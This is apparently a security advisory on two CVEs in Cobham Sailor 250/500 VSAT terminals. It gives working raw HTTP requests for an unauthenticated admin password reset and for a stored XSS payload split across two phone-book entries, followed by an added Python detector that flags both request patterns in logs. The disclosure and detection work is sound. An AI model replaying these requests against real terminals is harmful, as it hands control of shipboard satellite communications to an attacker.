Cobham Satcom Sailor 250 / 500 VSAT Vulnerabilities

The CyberSKR Maritime Security Team recently identified multiple vulnerabilities in Cobham Satcom products, specifically the Sailor 250 / 500 VSAT systems (version <1.25).

The vendor’s response was excellent, and we were put in contact with a senior member of the company almost immediately, who was able to action the information we provided them with in a very timely manner.

Vulnerability Overview – Cobham Satcom Sailor 250 / 500
  • Authentication Bypass via Unauthenticated Password Reset
  • Persistent Cross Site Scripting (XSS)

CVE-2018-19392: Sailor 250 / 500 Authentication Bypass via Unauthenticated Password Reset

It was possible for an unauthenticated user to reset a user's (including the default "admin" account's) password. This did not require prior knowledge of the user account's current password to be successful.

Example Unauthenticated Password Reset (Sailor 250/500)

Update --REDACTED-- with your target host/IP
POST /index.lua?pageID=Administration&langID=english HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Administration&langID=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie:
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

usernameAdmChange=admin&passwordAdmChange1=CyberSKR&passwordAdmChange2=CyberSKR

CVE-2018-19391: Sailor 250 / 500 Persistent XSS

A vulnerability was identified in the Cobham Satcom Sailor 250 / 500 systems where an unauthenticated threat actor could embed executable JavaScript code into the web application.

Sailor 250 / 500 Persistent XSS

Example Persistent XSS (Request 1)

Update --REDACTED-- where necessary
POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=2&phonebookPage=1 HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: tt_adm=--REDACTED--
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

name=<script>/*&number=1111111111

Example Persistent XSS (Request 2)

Update --REDACTED-- where necessary
POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=3&phonebookPage=1 HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Cookie: tt_adm=--REDACTED--
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

name=*/alert(1);</script>&number=1111111111
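
For defenders reviewing proxy or capture logs, the following added example (not CyberSKR's or the vendor's code) flags the two request shapes shown above: an admin password change sent without a session cookie, and a phone book save whose name field carries markup. It assumes tt_adm is the admin session cookie, as it appears in the phone book requests; the host name, cookie value, function names and finding labels are constructed for illustration.

```python
from urllib.parse import unquote_plus

def fields(encoded):
    """Decode an application/x-www-form-urlencoded string (query or body)."""
    out = {}
    for pair in filter(None, encoded.strip().split("&")):
        key, _, value = pair.partition("=")
        out[unquote_plus(key)] = unquote_plus(value)
    return out

def parse_request(raw):
    """Return (method, query fields, headers, body fields) of a raw request."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, fields(target.partition("?")[2]), headers, fields(body)

def findings(raw):
    """List the advisory's request patterns that this request matches."""
    method, query, headers, form = parse_request(raw)
    if method != "POST":
        return []
    hits, page = [], query.get("pageID", "")
    # Assumption: tt_adm is the admin session cookie (seen in the phone book requests).
    cookies = [c.strip() for c in headers.get("cookie", "").split(";")]
    has_session = any(c.startswith("tt_adm=") and len(c) > 7 for c in cookies)
    # CVE-2018-19392 shape: password-change fields arrive with no session cookie.
    if page == "Administration" and "usernameAdmChange" in form and not has_session:
        hits.append("unauthenticated-password-reset")
    # CVE-2018-19391 shape: the page's payload is split across two entries, so no
    # single name holds a complete script element; flag any markup character.
    if page == "Phone book" and query.get("phonebookOP") == "saveEntry":
        if any(ch in form.get("name", "") for ch in "<>"):
            hits.append("phonebook-markup")
    return hits

# Constructed sample requests (host, cookie value and passwords are placeholders).
RESET_NO_COOKIE = (
    "POST /index.lua?pageID=Administration&langID=english HTTP/1.1\r\n"
    "Host: terminal.example\r\nCookie:\r\n\r\n"
    "usernameAdmChange=admin&passwordAdmChange1=x&passwordAdmChange2=x")
RESET_WITH_COOKIE = RESET_NO_COOKIE.replace("Cookie:", "Cookie: tt_adm=constructed")
PHONEBOOK_MARKUP = (
    "POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry"
    "&entryIndex=2&phonebookPage=1 HTTP/1.1\r\nHost: terminal.example\r\n\r\n"
    "name=<script>/*&number=1111111111")
PHONEBOOK_BENIGN = PHONEBOOK_MARKUP.replace("<script>/*", "Bridge")
```

A present tt_adm cookie only shows that a session value was sent, not that it was valid, so a clean result here does not replace upgrading affected units.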